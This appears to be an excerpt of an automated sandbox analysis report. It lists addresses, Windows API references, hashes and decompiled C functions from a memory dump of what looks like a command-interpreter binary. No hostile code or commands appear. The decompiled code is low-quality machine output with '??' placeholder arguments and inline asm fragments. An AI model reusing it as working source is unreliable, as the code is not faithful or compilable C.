                                0x00000000
                                0x4a56806f
                                0x4a56806f
                                0x4a568076
                                0x00000000
                                0x4a56807c
                                0x4a56807c
                                0x4a568082
                                0x4a568088
                                0x4a56808f
                                0x00000000
                                0x4a568095
                                0x4a568095
                                0x4a56809c
                                0x4a56809c
                                0x4a56809f
                                0x00000000
                                0x00000000
                                0x4a5680a1
                                0x4a5680a3
                                0x4a5680a9
                                0x4a5680ac
                                0x4a5680af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5680af
                                0x4a5680b1
                                0x4a5680b4
                                0x00000000
                                0x4a5680ba
                                0x4a5680ba
                                0x4a5680bc
                                0x4a5680c2
                                0x4a5680c5
                                0x4a5680c8
                                0x00000000
                                0x4a5680ce
                                0x4a5680ce
                                0x4a5680ce
                                0x4a5680d1
                                0x00000000
                                0x00000000
                                0x4a5680d7
                                0x4a5680d9
                                0x4a5680df
                                0x4a5680e2
                                0x4a5680e5
                                0x00000000
                                0x4a5680eb
                                0x00000000
                                0x4a5680e5
                                0x4a56245e
                                0x4a562461
                                0x00000000
                                0x4a562463
                                0x00000000
                                0x4a562463
                                0x4a562461
                                0x4a5680c8
                                0x4a5680b4
                                0x4a56808f
                                0x4a568076
                                0x4a562450
                                0x4a562450
                                0x4a562456
                                0x4a562456
                                0x4a562487
                                0x4a562487
                                0x4a562487
                                0x4a56248a
                                0x4a56248d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56246d
                                0x4a56246d
                                0x4a56246d
                                0x4a562470
                                0x00000000
                                0x00000000
                                0x4a562472
                                0x4a562474
                                0x4a56247a
                                0x4a56247d
                                0x4a562480
                                0x00000000
                                0x4a562482
                                0x4a562482
                                0x4a562485
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a562485
                                0x00000000
                                0x4a562480
                                0x4a5624aa
                                0x4a5624ac
                                0x4a5624b7
                                0x4a5624bd
                                0x4a5624bf
                                0x4a5624ce
                                0x4a5624d6
                                0x4a5624d9
                                0x4a5624df
                                0x4a5624df
                                0x00000000
                                0x4a5624c1
                                0x4a5624c1
                                0x4a5624c7
                                0x4a5624cc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5624cc
                                0x00000000
                                0x4a5624bf
                                0x4a56248f
                                0x4a562497
                                0x4a56249d
                                0x4a56249f
                                0x00000000
                                0x4a5624a5
                                0x4a5680ed
                                0x4a5680f3
                                0x4a5680f8
                                0x00000000
                                0x4a5680fe
                                0x00000000
                                0x4a5680fe
                                0x4a5680f8
                                0x4a56249f
                                0x4a56244a
                                0x4a56243a
                                0x4a56242e
                                0x00000000
                                0x4a55f8ac
                                0x4a55f8ac
                                0x4a55f8ac
                                0x4a55f8ac
                                0x4a55f8a6
                                0x4a55f896
                                0x4a55f8ae
                                0x4a55f8ae
                                0x4a55f8af
                                0x4a55f85c
                                0x4a55f860
                                0x4a55f867
                                0x4a568021
                                0x4a568022
                                0x4a568024
                                0x4a56802d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55f867
                                0x4a55f8bc
                                0x00000000

                                APIs
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 4A55F884
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 4A55F89E
                                  • Part of subcall function 4A552B68: GetDriveTypeW.KERNEL32(?,?,?,?,4A551571,?,?,4A55745B,-00000003,00000000,00000000,00000000,00000000,?,00000004,?), ref: 4A552B9D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateDirectoryDriveFullNamePathType
                                • String ID: :
                                • API String ID: 3208614439-336475711
                                • Opcode ID: 3a78b2a84f214c8dc6bf9b39882747660a02bde08557cd4ff205dac020214614
                                • Instruction ID: d249bdd1f253cab2639d6fe68c232da029f4292fdd746b405625890db8a00561
                                • Opcode Fuzzy Hash: 3a78b2a84f214c8dc6bf9b39882747660a02bde08557cd4ff205dac020214614
                                • Instruction Fuzzy Hash: 2051F9B1E01219EAD760AB50DE987AE7BBCEF05751F414897E10DEB444E7B48EC0CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55F05C, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 155COMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E4A55F05C(intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v24;
				wchar_t* _t56;
				long _t57;
				long _t65;
				signed int _t70;
				intOrPtr* _t87;

				_t65 = E4A55F123( &_a8) & 0x0000ffff;
				if(_t65 == 0) {
					L23:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t65 == 0x28) {
					_a8 =  &(_a8[0]);
					asm("movsd");
					asm("movsd");
					_push( &_v24);
					asm("movsd");
					E4A55ECB3();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					if(E4A55F123( &_a8) != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 =  &(_a8[0]);
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t65) != 0) {
					_a8 =  &(_a8[0]);
					asm("movsd");
					asm("movsd");
					_push( &_v24);
					asm("movsd");
					E4A55F05C();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_a16 != 0) {
						goto L21;
					}
					E4A55FAF0( &_a8, _t65, _a12);
					goto L9;
				}
				if(iswdigit(_t65) == 0) {
					if(E4A55F176( &_a8,  &_v12,  &_v8) == 0) {
						goto L23;
					} else {
						_a12 = E4A55EB3C(_v12, _v8);
						goto L9;
					}
				}
				_t87 = __imp___errno;
				 *((intOrPtr*)( *_t87())) = 0;
				_t56 = _a8;
				if( *_t56 == 0x30) {
					_t70 = _t56[0] & 0x0000ffff;
					if(_t70 == 0x78) {
						L25:
						_t57 = wcstoul(_t56,  &_a8, 0);
						L6:
						_a12 = _t57;
						if(_t57 == 0x7fffffff) {
							if( *((intOrPtr*)( *_t87())) != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					if(_t70 != 0x58) {
						goto L5;
					}
					goto L25;
				}
				L5:
				_t57 = wcstol(_t56,  &_a8, 0);
				goto L6;
			}











                                0x4a55f070
                                0x4a55f078
                                0x4a5652cb
                                0x4a5652cb
                                0x4a55f10c
                                0x4a55f10f
                                0x4a55f114
                                0x4a55f115
                                0x4a55f116
                                0x4a55f11b
                                0x4a55f11b
                                0x4a55f082
                                0x4a55f5de
                                0x4a55f5ea
                                0x4a55f5eb
                                0x4a55f5ef
                                0x4a55f5f0
                                0x4a55f5f1
                                0x4a55f5fb
                                0x4a55f5fc
                                0x4a55f5fd
                                0x4a55f602
                                0x4a55fad8
                                0x00000000
                                0x4a55fad8
                                0x4a55f615
                                0x4a5652d7
                                0x4a55f61b
                                0x4a55f61b
                                0x4a55f61b
                                0x00000000
                                0x4a55f615
                                0x4a55f098
                                0x4a55faa0
                                0x4a55faac
                                0x4a55faad
                                0x4a55fab1
                                0x4a55fab2
                                0x4a55fab3
                                0x4a55fabd
                                0x4a55fabe
                                0x4a55fabf
                                0x4a55fac4
                                0x00000000
                                0x00000000
                                0x4a55face
                                0x00000000
                                0x4a55face
                                0x4a55f0aa
                                0x4a55f27c
                                0x00000000
                                0x4a55f282
                                0x4a55f28d
                                0x00000000
                                0x4a55f28d
                                0x4a55f27c
                                0x4a55f0b0
                                0x4a55f0b8
                                0x4a55f0ba
                                0x4a55f0c1
                                0x4a55f2ca
                                0x4a55f2d2
                                0x4a5652e3
                                0x4a5652e9
                                0x4a55f0d3
                                0x4a55f0d6
                                0x4a55f0de
                                0x4a5652f9
                                0x00000000
                                0x00000000
                                0x4a5652ff
                                0x00000000
                                0x4a5652ff
                                0x4a55f0e4
                                0x4a55f0f0
                                0x4a55fadf
                                0x4a55fadf
                                0x00000000
                                0x4a55f0f0
                                0x4a55f2dc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55f2e2
                                0x4a55f0c7
                                0x4a55f0cd
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                • String ID: +-~!
                                • API String ID: 2191331888-2604099254
                                • Opcode ID: 879e83de9ae6747f730b90c23822f8cc6c5d5c6035153629c5c8f0a6dca4b607
                                • Instruction ID: 7081a2ddd90b5d4c7b0219658aa376d6f593261a07384b283c8e100922f5653d
                                • Opcode Fuzzy Hash: 879e83de9ae6747f730b90c23822f8cc6c5d5c6035153629c5c8f0a6dca4b607
                                • Instruction Fuzzy Hash: 19415F76801109ABDB01EF64DA4499B3BADEF46324F418523FD15EB098D774DF08CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A561F83, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 29%
                                			E4A561F83(WCHAR* _a4, long _a8, long _a12) {
				long _v8;
				void* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				signed int _t35;
				WCHAR* _t37;
				void* _t38;
				void* _t40;
				long _t41;
				signed char _t46;
				void* _t48;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				long _t59;
				void* _t61;

				_t46 = _a8;
				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t55 = 3;
				_t35 = _t46 & _t55;
				_t59 = 2;
				_v24.bInheritHandle = 1;
				_v24.nLength = 0xc;
				if(_t35 > _t59) {
					L8:
					_t57 = _t56 | 0xffffffff;
					L7:
					return _t57;
				}
				if((1 & _t46) != 0) {
					if((_t46 & 0x00000008) == 0) {
						goto L2;
					}
					goto L8;
				}
				L2:
				if(_t35 != 0) {
					_a8 = 0x40000000;
					if((_t46 & 0x00000002) != 0) {
						_a8 = 0xc0000000;
					}
					__imp___wcsicmp(_a4, "con");
					_pop(_t48);
					if(_t35 != 0) {
						_a12 = 1;
					}
					_v8 = _t59;
				} else {
					_a8 = 0x80000000;
					_v8 = _t55;
					__imp___wcsicmp(_a4, "con");
					_pop(_t48);
					if(_t35 == 0) {
						_a12 = 1;
					}
				}
				_t37 = E4A552598(_t48, _a4);
				_a4 = _t37;
				if(_v8 == _t59) {
					_t38 = CreateFileW(_t37, _a8, _a12,  &_v24, 3, 0x8000080, 0);
					_v12 = _t38;
					if(_t38 == 0xffffffffffffffff) {
						goto L5;
					}
					__imp___open_osfhandle(_t38, 8);
					_t57 = _t38;
					if(_t57 != 0xffffffffffffffff) {
						goto L7;
					}
					_push(_v12);
					goto L20;
				} else {
					L5:
					_t40 = CreateFileW(_a4, _a8, _a12,  &_v24, _v8, 0x8000080, 0);
					_t61 = _t40;
					if(_t61 == 0xffffffffffffffff) {
						_t41 = GetLastError();
						 *0x4a574128 = _t41;
						if(_t41 == 0x6e) {
							 *0x4a574128 = 2;
						}
						_t57 = 0xffffffffffffffff;
						goto L7;
					}
					__imp___open_osfhandle(_t61, 8);
					_t57 = _t40;
					if(_t57 == 0xffffffffffffffff) {
						_push(_t61);
						L20:
						CloseHandle();
					}
					goto L7;
				}
			}


















                                0x4a561f8b
                                0x4a561f8e
                                0x4a561f97
                                0x4a561f9f
                                0x4a561fa1
                                0x4a561fa2
                                0x4a561fa5
                                0x4a561fae
                                0x4a562045
                                0x4a562045
                                0x4a56203c
                                0x4a562042
                                0x4a562042
                                0x4a561fb6
                                0x4a569c21
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a569c27
                                0x4a561fbc
                                0x4a561fbe
                                0x4a569c2c
                                0x4a569c36
                                0x4a569c38
                                0x4a569c38
                                0x4a569c47
                                0x4a569c4e
                                0x4a569c51
                                0x4a569c53
                                0x4a569c53
                                0x4a569c56
                                0x4a561fc4
                                0x4a561fcc
                                0x4a561fd3
                                0x4a561fd6
                                0x4a561fdd
                                0x4a561fe0
                                0x4a569c5e
                                0x4a569c5e
                                0x4a561fe0
                                0x4a561fe9
                                0x4a561ffa
                                0x4a562002
                                0x4a569c76
                                0x4a569c78
                                0x4a569c7d
                                0x00000000
                                0x00000000
                                0x4a569c86
                                0x4a569c8c
                                0x4a569c92
                                0x00000000
                                0x00000000
                                0x4a569c98
                                0x00000000
                                0x4a562008
                                0x4a562008
                                0x4a56201b
                                0x4a56201d
                                0x4a562021
                                0x4a569ca6
                                0x4a569cac
                                0x4a569cb4
                                0x4a569cb6
                                0x4a569cb6
                                0x4a569cc0
                                0x00000000
                                0x4a569cc0
                                0x4a56202a
                                0x4a562030
                                0x4a562036
                                0x4a569cc7
                                0x4a569c9b
                                0x4a569c9b
                                0x4a569c9b
                                0x00000000
                                0x4a562036

                                APIs
                                • _wcsicmp.MSVCRT ref: 4A561FD6
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,08000080,0000233F,08000080,00000000), ref: 4A56201B
                                • _open_osfhandle.MSVCRT ref: 4A56202A
                                • _wcsicmp.MSVCRT ref: 4A569C47
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,08000080,00000000), ref: 4A569C76
                                • _open_osfhandle.MSVCRT ref: 4A569C86
                                • CloseHandle.KERNEL32(00000000), ref: 4A569C9B
                                • GetLastError.KERNEL32 ref: 4A569CA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFile_open_osfhandle_wcsicmp$CloseErrorHandleLast
                                • String ID: con
                                • API String ID: 2772705192-4257191772
                                • Opcode ID: aa6a3edec08fd26c1e9b6ac413c1b90636dd3098f46fe4cb6a72cab9761ba0b8
                                • Instruction ID: a5666c624d5b229999be1eccef48fdec17e84cf475685e50d594b5d2a47637f3
                                • Opcode Fuzzy Hash: aa6a3edec08fd26c1e9b6ac413c1b90636dd3098f46fe4cb6a72cab9761ba0b8
                                • Instruction Fuzzy Hash: A8419D72944209FFEB10AF55CB45B9E7FB9FB45364F21852AF919EB190EB708A00CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55BD84, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 83%
                                			E4A55BD84(struct HINSTANCE__* _a4, long* _a8) {
				signed int _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v24;
				CHAR* _v36;
				void _v44;
				char _v48;
				struct HINSTANCE__* _t34;
				signed int _t37;
				long _t39;
				int _t42;
				CHAR* _t46;
				signed short _t48;
				signed int _t49;
				void* _t52;
				struct HINSTANCE__* _t57;
				LONG* _t61;
				long _t62;
				int _t63;

				_t34 = _a4;
				_v8 = _v8 & 0x00000000;
				_t61 =  *((intOrPtr*)(_t34 + 8)) + 0x4a550000;
				_t52 =  *_t61;
				_t46 =  *((intOrPtr*)(_t34 + 4)) + 0x4a550000;
				_t48 =  *( *((intOrPtr*)(_t34 + 0x10)) + 0x4a550000 + (_a8 -  *((intOrPtr*)(_t34 + 0xc)) - 0x4a550000 >> 2) * 4);
				_a4 = _t52;
				_t13 = _t48 + 0x4a550002; // 0x94aa0002
				_t37 = _t13;
				if(_t48 < 0) {
					_t37 = _t48 & 0x0000ffff;
				}
				_v12 = _t37;
				if(_t52 == 0) {
					_t57 = LoadLibraryExA(_t46, _t52, _t52);
					_a4 = _t57;
					if(_t57 == 0) {
						_t39 = GetLastError();
						if(_t39 == 0x7e || _t39 == 0xc1) {
							_t39 = InterlockedCompareExchange(_t61, 0xffffffff, 0);
							if(_t39 == 0) {
								goto L23;
							} else {
								_a4 = _t39;
								goto L2;
							}
						} else {
							goto L26;
						}
					} else {
						_t42 = InterlockedCompareExchange(_t61, _t57, 0);
						_t63 = _t42;
						if(_t63 != 0) {
							_t39 = FreeLibrary(_t57);
							_a4 = _t63;
						} else {
							_t49 = 8;
							memset( &_v44, _t42, _t49 << 2);
							_v24 = _a4;
							_t39 =  *0x4a55be9c; // 0x0
							_v48 = 0x24;
							_v36 = _t46;
							if(_t39 != 0) {
								_t39 =  *_t39(5,  &_v48);
							}
						}
						goto L2;
					}
				} else {
					L2:
					if(_a4 == 0xffffffff) {
						L23:
						_v8 = 1;
						goto L26;
					} else {
						if(_a4 == 0) {
							L26:
							_push(_v12);
							_push(_t46);
							L4A57241B();
							_t62 = _t39;
						} else {
							_t39 = GetProcAddress(_a4, _v12);
							_t62 = _t39;
							if(_t62 == 0) {
								_t39 = GetLastError();
								if(_t39 != 0x7f) {
									if(_t39 != 0xb6) {
										goto L6;
									} else {
										goto L5;
									}
								} else {
									goto L5;
								}
								L27:
							} else {
								L5:
								_v8 = 1;
							}
							L6:
							if(_t62 == 0) {
								goto L26;
							}
						}
					}
				}
				if(_v8 != 0) {
					 *_a8 = _t62;
				}
				return _t62;
				goto L27;
			}





















                                0x4a55bd8c
                                0x4a55bd8f
                                0x4a55bdaf
                                0x4a55bdb1
                                0x4a55bdba
                                0x4a55bdbc
                                0x4a55bdbe
                                0x4a55bdc1
                                0x4a55bdc1
                                0x4a55bdc9
                                0x4a56bbc9
                                0x4a56bbc9
                                0x4a55bdcf
                                0x4a55bdd4
                                0x4a55be40
                                0x4a55be42
                                0x4a55be47
                                0x4a56bbec
                                0x4a56bbf4
                                0x4a56bc02
                                0x4a56bc09
                                0x00000000
                                0x4a56bc0b
                                0x4a56bc0b
                                0x00000000
                                0x4a56bc0b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55be4d
                                0x4a55be51
                                0x4a55be56
                                0x4a55be5a
                                0x4a56bbdf
                                0x4a56bbe4
                                0x4a55be60
                                0x4a55be62
                                0x4a55be66
                                0x4a55be6b
                                0x4a55be6e
                                0x4a55be73
                                0x4a55be7a
                                0x4a55be7f
                                0x4a56bbd7
                                0x4a56bbd7
                                0x4a55be7f
                                0x00000000
                                0x4a55be5a
                                0x4a55bdd6
                                0x4a55bdd6
                                0x4a55bdda
                                0x4a56bc13
                                0x4a56bc13
                                0x00000000
                                0x4a55bde0
                                0x4a55bde4
                                0x4a56bc2f
                                0x4a56bc2f
                                0x4a56bc32
                                0x4a56bc33
                                0x4a56bc38
                                0x4a55bdea
                                0x4a55bdf0
                                0x4a55bdf5
                                0x4a55bdf9
                                0x4a56bc1c
                                0x4a56bc24
                                0x4a55be8f
                                0x00000000
                                0x4a55be95
                                0x00000000
                                0x4a55be95
                                0x4a56bc2a
                                0x00000000
                                0x4a56bc2a
                                0x00000000
                                0x4a55bdff
                                0x4a55bdff
                                0x4a55bdff
                                0x4a55bdff
                                0x4a55be06
                                0x4a55be08
                                0x00000000
                                0x00000000
                                0x4a55be08
                                0x4a55bde4
                                0x4a55bdda
                                0x4a55be12
                                0x4a55be17
                                0x4a55be17
                                0x4a55be1f
                                0x00000000

                                APIs
                                • GetProcAddress.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 4A55BDF0
                                • LoadLibraryExA.KERNEL32(00000000), ref: 4A55BE3B
                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 4A55BE51
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressCompareExchangeInterlockedLibraryLoadProc
                                • String ID: $
                                • API String ID: 792202920-3993045852
                                • Opcode ID: 38b48057f97d9a419502dfa91d1eea9d1a13c69b2d6d1a98b0e6b3c2b8286499
                                • Instruction ID: aad8e93ffd9af44ae5b01812d7bc17e7568c06af252e8eb8481a8555b12cb92e
                                • Opcode Fuzzy Hash: 38b48057f97d9a419502dfa91d1eea9d1a13c69b2d6d1a98b0e6b3c2b8286499
                                • Instruction Fuzzy Hash: E741F67190021AFFDB218F55CA44B9EBBA4AFA4360F17851BE904BF25DE770D640CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56301F, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 92windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 81%
                                			E4A56301F(void* __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v8;
				char _v40;
				short _v104;
				short _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				long _t30;
				signed int _t35;
				void* _t46;
				intOrPtr _t50;
				void* _t53;
				void* _t55;
				signed int _t56;

				_t53 = __edx;
				_t25 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t25 ^ _t56;
				_t50 = _a4;
				_t55 = FormatMessageW;
				_v112 =  &_a16;
				_v108 = 0;
				_t30 = FormatMessageW(0x1900, 0, _a8, 0,  &_v108, 0xa,  &_v112);
				_v112 = 0;
				if(_t30 == 0) {
					__imp___ultoa(_a8,  &_v40, 0x10);
					_t35 = E4A554B8D(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t35),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_v116 = L"Application";
					if(_a8 < 0x2328) {
						_v116 = L"System";
					}
					if(FormatMessageW(0x3100, 0, 0x13d, 0,  &_v108, 0xa,  &_v120) != 0) {
						goto L1;
					}
					_t46 = 1;
					L4:
					return E4A5513A9(_t46, _t50, _v8 ^ _t56, _t53, 0, _t55);
				}
				L1:
				E4A55AAF4(_t50, _v108);
				if(E4A55A8A9(_t50,  *((intOrPtr*)(_t50 + 0x10))) != 0) {
					E4A55B0F9(_t50, _t53, 0, _t50);
				}
				LocalFree(_v108);
				_t46 = 0;
				goto L4;
			}





















                                0x4a56301f
                                0x4a563027
                                0x4a56302e
                                0x4a563032
                                0x4a563036
                                0x4a563040
                                0x4a563053
                                0x4a56305c
                                0x4a56305e
                                0x4a563063
                                0x4a567c13
                                0x4a567c2f
                                0x4a567c36
                                0x4a567c3c
                                0x4a567c4c
                                0x4a567c4f
                                0x4a567c56
                                0x4a567c58
                                0x4a567c58
                                0x4a567c79
                                0x00000000
                                0x00000000
                                0x4a567c81
                                0x4a563090
                                0x4a56309e
                                0x4a56309e
                                0x4a563069
                                0x4a56306d
                                0x4a56307d
                                0x4a563080
                                0x4a563080
                                0x4a563088
                                0x4a56308e
                                0x00000000

                                APIs
                                • FormatMessageW.KERNEL32(00001900,00000000,00000000,00000000,?,0000000A,?,?,?,?), ref: 4A56305C
                                • LocalFree.KERNEL32(?,?,?), ref: 4A563088
                                • _ultoa.MSVCRT ref: 4A567C13
                                • GetACP.KERNEL32(?,000000FF,?,00000020), ref: 4A567C28
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000), ref: 4A567C3C
                                • FormatMessageW.KERNEL32(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 4A567C75
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                • String ID: (#$Application$System
                                • API String ID: 3377411628-593978566
                                • Opcode ID: 552841f19beb5b419b6448b2cbdad79e6c3067c9a8c4607b915fc4070fba7643
                                • Instruction ID: f4741223215a2ec5123810fd86723c0453161e5ecf1975e926c82b792f9c2cfd
                                • Opcode Fuzzy Hash: 552841f19beb5b419b6448b2cbdad79e6c3067c9a8c4607b915fc4070fba7643
                                • Instruction Fuzzy Hash: CE3130B1900208ABDB11EFA5CE48DEE7BBCFB89710F514526F515EB195DB309A05CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A556640, Relevance: 15.2, APIs: 10, Instructions: 171COMMON
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E4A556640(int __ebx, void* __edx, void* __edi) {
				void* _t42;
				void* _t47;
				short* _t49;
				short* _t50;
				intOrPtr _t54;
				void* _t57;
				void* _t60;
				void* _t73;
				long _t74;
				void* _t75;
				void* _t81;
				long _t84;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				short* _t91;
				void* _t93;
				intOrPtr* _t94;
				int _t105;
				signed int _t107;

				L0:
				while(1) {
					L0:
					_t88 = __edi;
					_t87 = __edx;
					_t74 = __ebx;
					_t42 = E4A5518EB( *((intOrPtr*)(_t107 - 0x210)), 0xa);
					_t90 = _t42;
					if(_t90 == __ebx) {
						goto L27;
					}
					L3:
					E4A55654D( *((intOrPtr*)(_t107 - 0x224)), _t107 - 0x204, 0x80, _t74);
					_t47 = _t107 - 0x104;
					__imp___wcsicmp(_t47, _t107 - 0x204);
					if(_t47 != 0) {
						L13:
						_t91 = E4A5518EB(_t90, 0x3a);
						if(_t91 != _t74) {
							L23:
							_t49 = _t91;
							_t90 = _t91 + 2;
							while(1) {
								L9:
								 *((intOrPtr*)(_t107 - 0x210)) = _t49;
								if( *_t49 == 0xa) {
									break;
								}
								L7:
								if(_t49 == 0x4a588640) {
									break;
								}
								L8:
								_t49 = _t49;
							}
							L10:
							if( *_t49 != 0x3a) {
								 *((intOrPtr*)(_t107 - 0x210)) = _t49;
							}
							L12:
							_t50 = E4A552B0D(_t49, _t74);
							 *((intOrPtr*)(_t107 - 0x224)) = _t50;
							if( *_t50 == 0x3a) {
								continue;
							}
							goto L13;
						}
						L14:
						if( *0x4a5740b8 == 1) {
							L1:
							E4A553AB3( *(_t107 - 0x208));
							_t54 =  *((intOrPtr*)(_t107 - 0x218));
							_pop(_t89);
							_pop(_t93);
							_pop(_t75);
							return E4A5513A9(_t54, _t75,  *(_t107 - 4) ^ _t107, _t87, _t89, _t93);
						} else {
							goto L15;
						}
						while(1) {
							L15:
							E4A554B2A(_t48);
							_t94 = __imp___get_osfhandle;
							_t57 =  *_t94( *(_t107 - 0x208), _t74, _t74, 1);
							_pop(_t81);
							_t58 = SetFilePointer(_t57, ??, ??, ??);
							 *(_t88 + 8) = _t58;
							if(_t58 >=  *((intOrPtr*)(_t107 - 0x228)) &&  *(_t107 - 0x214) == _t74) {
							}
							L24:
							if( *(_t107 - 0x20c) != _t74) {
								L29:
								E4A5557F4(_t58, _t88);
								L40:
								 *0x4a5740b4 =  *((intOrPtr*)(_t88 + 0x110));
								E4A556D44(_t81, 0x400023ab, 1, _t107 - 0x104);
								 *((intOrPtr*)(_t107 - 0x218)) = 1;
								goto L1;
							}
							L25:
							if( *(_t107 - 0x214) == _t74) {
								goto L29;
							}
							L26:
							_t48 = SetFilePointer( *_t94(_t74),  *(_t107 - 0x208), _t74, _t74);
							 *(_t107 - 0x214) = _t74;
							while(1) {
								L15:
								E4A554B2A(_t48);
								_t94 = __imp___get_osfhandle;
								_t57 =  *_t94( *(_t107 - 0x208), _t74, _t74, 1);
								_pop(_t81);
								_t58 = SetFilePointer(_t57, ??, ??, ??);
								 *(_t88 + 8) = _t58;
								if(_t58 >=  *((intOrPtr*)(_t107 - 0x228)) &&  *(_t107 - 0x214) == _t74) {
								}
								goto L17;
							}
							goto L24;
							L17:
							_t60 =  *_t94( *(_t107 - 0x208), 0x4a588640, 0x200, _t107 - 0x20c);
							_pop(_t81);
							_push(_t60);
							if(E4A5567D3() == 0) {
								goto L24;
							}
							L18:
							_t58 =  *(_t107 - 0x20c);
							if(_t58 == _t74) {
								goto L25;
							}
							L19:
							if(_t58 == 0xffffffff ||  *0x4a588640 == _t74 ||  *((intOrPtr*)(_t107 - 0x104)) == _t74) {
								goto L24;
							} else {
								L22:
								0x4a588640[_t58] = 0;
								_t91 = E4A5518EB(0x4a588640, 0x3a);
								if(_t91 == _t74) {
									continue;
								}
								goto L23;
							}
						}
					}
					L4:
					 *0x4a5740b8 =  *( *((intOrPtr*)(_t107 - 0x220)) + 0x40) & 0x00000001;
					_t48 = E4A55661C();
					if(_t90 == _t74) {
						L34:
						if(_t48 == 0) {
							L36:
							_t48 =  *(_t107 - 0x20c);
							L39:
							 *(_t88 + 8) =  *(_t88 + 8) + _t48;
							goto L14;
						}
						L35:
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push( *(_t107 - 0x20c));
						_push(0x4a588640);
						L38:
						_t48 = WideCharToMultiByte( *0x4a5741b8, _t74, ??, ??, ??, ??, ??, ??);
						goto L39;
					}
					L5:
					if(_t48 != 0) {
						L37:
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push(_t74);
						_push(_t90 - 0x4a588640 + 2 >> 1);
						_push(0x4a588640);
						goto L38;
					}
					L6:
					 *(_t88 + 8) =  *(_t88 + 8) + (_t90 - 0x4a588640 + 2 >> 1);
					goto L14;
					L27:
					__imp___get_osfhandle(1);
					if(SetFilePointer(_t42,  *(_t107 - 0x208), __ebx, __ebx) ==  *((intOrPtr*)(_t107 - 0x21c))) {
						goto L3;
					}
					L28:
					L30:
					_t84 =  *(_t107 - 0x20c);
					if(_t84 == 0x200) {
						goto L3;
					}
					L31:
					_t105 = _t84 - ( *((intOrPtr*)(_t107 - 0x210)) - 0x4a588640 >> 1);
